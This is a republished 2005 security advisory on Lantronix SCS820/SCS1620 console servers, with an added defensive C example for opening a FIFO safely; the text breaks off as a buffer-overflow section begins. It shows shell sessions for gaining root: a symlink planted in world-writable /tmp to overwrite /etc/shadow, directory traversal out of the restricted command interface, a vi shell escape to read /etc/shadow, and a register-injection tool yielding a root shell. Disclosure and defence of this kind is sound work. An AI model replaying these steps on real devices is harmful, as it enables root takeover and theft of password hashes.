Lantronix Secure Console Server SCS820/SCS162…
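2008-04-09 04:15:07 Source: Internet
Published: 2005-08-08
Updated: 2005-08-08
Affected systems:
Lantronix Secure Console Server SCS820
Lantronix Secure Console Server SCS1620
Description:
BUGTRAQ ID: 14486
The SCS820 and SCS1620 are members of the ActiveLinx family of Secure Console Servers (SCS), used to handle local and remote IT incidents.
Multiple security vulnerabilities exist in the Lantronix Secure Console Server that allow an attacker to gain root privileges through buffer overflows and an insecure file system configuration.
1 Overwriting files owned by root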
----------
[c0ntex@SCS1620 /tmp]$ ls -al
total 2
drwxrwxrwx 2 root root 1024 Oct 31 00:50 ./
drwxr-xr-x 16 root root 1024 Oct 20 11:38 ../
prw-rw-rw- 1 root root 0 Oct 31 00:14 listen_fifo_server|
[c0ntex@SCS1620 /tmp]$ mv listen_fifo_server listen_fifo_server.orig
[c0ntex@SCS1620 /tmp]$ ln -s /etc/shadow listen_fifo_server
The user now waits for a system administrator to log in, in order to compromise the console:
sysadmin>listen 01
Please wait for connection..
sysadmin-DEVICE_01>logout
[sysadmin@SCS1620 /tmp]$ su - root
Password:
su: incorrect password # odd......
In another window:
[root@SCS1620 /tmp]# head /etc/shadow
j /tmp/listen_fifo_5226;DEVICE_0121:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
adm:*:11529:0:99999:7:::
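One way a daemon could open listen_fifo_server so that the rename-and-symlink swap shown above is refused, written as an added example (it is not Lantronix code and not part of the original advisory). The helper name open_fifo_checked, the private owner-only directory and the owner-uid policy are assumptions; the demo runs in a constructed temporary directory.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: fd for dir/name, or -1 with errno set; owner must own both. */
int open_fifo_checked(const char *dir, const char *name, uid_t owner, int access)
{
    struct stat st;
    int fd = -1, err = EPERM;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    /* Only the owner may rename or replace entries in the directory. */
    if (fstat(dfd, &st) == 0 && st.st_uid == owner &&
        !(st.st_mode & (S_IWGRP | S_IWOTH))) {
        /* O_NOFOLLOW refuses a symlink (ELOOP); O_NONBLOCK avoids blocking on the peer. */
        fd = openat(dfd, name, access | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
        err = errno;
    }
    close(dfd);
    /* Check the object that was opened, not the path. */
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISFIFO(st.st_mode) ||
                    st.st_uid != owner)) {
        close(fd);
        fd = -1;
        err = EPERM;
    }
    if (fd < 0)
        errno = err;
    return fd;
}

/* Constructed demo: symlink planted under the FIFO's name; returns errno of the refusal. */
int demo_planted_symlink(void)
{
    char dir[] = "/tmp/fifo_demo_XXXXXX", p[64];
    if (!mkdtemp(dir) || snprintf(p, sizeof p, "%s/listen_fifo_server", dir) < 0 ||
        symlink("/etc/shadow", p) != 0)
        return -1;
    int fd = open_fifo_checked(dir, "listen_fifo_server", geteuid(), O_RDONLY);
    int err = fd < 0 ? errno : 0;
    unlink(p);
    rmdir(dir);
    return err;
}
int main(void) { printf("open refused, errno=%d\n", demo_planted_symlink()); return 0; }
```

The directory check addresses the root cause visible in the listing above: /tmp is drwxrwxrwx with no sticky bit, so any user can rename a root-owned entry in it.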
2 Directory traversal to gain access to the underlying system
----------
c0ntex>?
Commands:
alias - List command aliases
cat - Print history buffer
clear - Clear port buffer
connections - show active connections
...
c0ntex>/bin/bash
/bin/bash: unknown command
c0ntex>
c0ntex>
c0ntex>../../../bin/bash
[c0ntex@SCS1620 /var/tmp]$
3 Sysadmin becomes root
----------
sysadmin>
sysadmin>
sysadmin>bash
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ exit
sysadmin>../../../bin/cat /etc/shadow
root:$1$kjhfiusdhf9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
sysadmin>../../../bin/vi
~
~
~
~
~
:!cat /etc/shadow
root:$1$kjhsfsdfsdff9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
~
~
~
~
~
:q!
Running bash as sysadmin from the ci interface under strace gives the following:
sysadmin>bash
...
14441 [400d8367] getuid() = 500
14441 [400f775b] setresuid(ruid 4294967295, euid 500, suid 4294967295) = 0
Via directory traversal:
sysadmin> ../../../bin/bash
...
14392 [400ab367] getuid() = 500
14392 [400ab3c7] getgid() = 100
14392 [400ab397] geteuid() = 0
14392 [400ab3f7] getegid() = 100
...
sysadmin>../../../home/sysadmin/snakeoil 10719
Attached process [10719] OK!
Stack regsiters for PID of [10719]
Stack Address of %eax = [0xfffffe00]
Stack Address of %ebx = [0xbffff100]
Stack Address of %ecx = [0x00000000]
Stack Address of %edx = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of %ebp = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of %edi = [0xffffffff]
Stack Address of %eip = [0x400d79a9]
Injecting %eip register with [0xbffff2bb]
Stack regsiters for PID of [10719]
Stack Address of %eax = [0xfffffe00]
Stack Address of %ebx = [0xbffff100]
Stack Address of %ecx = [0x00000000]
Stack Address of %edx = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of %ebp = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of %edi = [0xffffffff]
Stack Address of %eip = [0xbffff2bb]
Detached process [10719] OK!
bash#
4 Becoming root through a buffer overflow in the edituser binary
[sysadmin@SCS1620 /usr/local/bin]$ ls -al edituser
-rwsr-xr-x 1 root root 12912 Apr 15 2003 edituser
[sysadmin@SCS1620 /usr/local/bin]$ su - c0ntex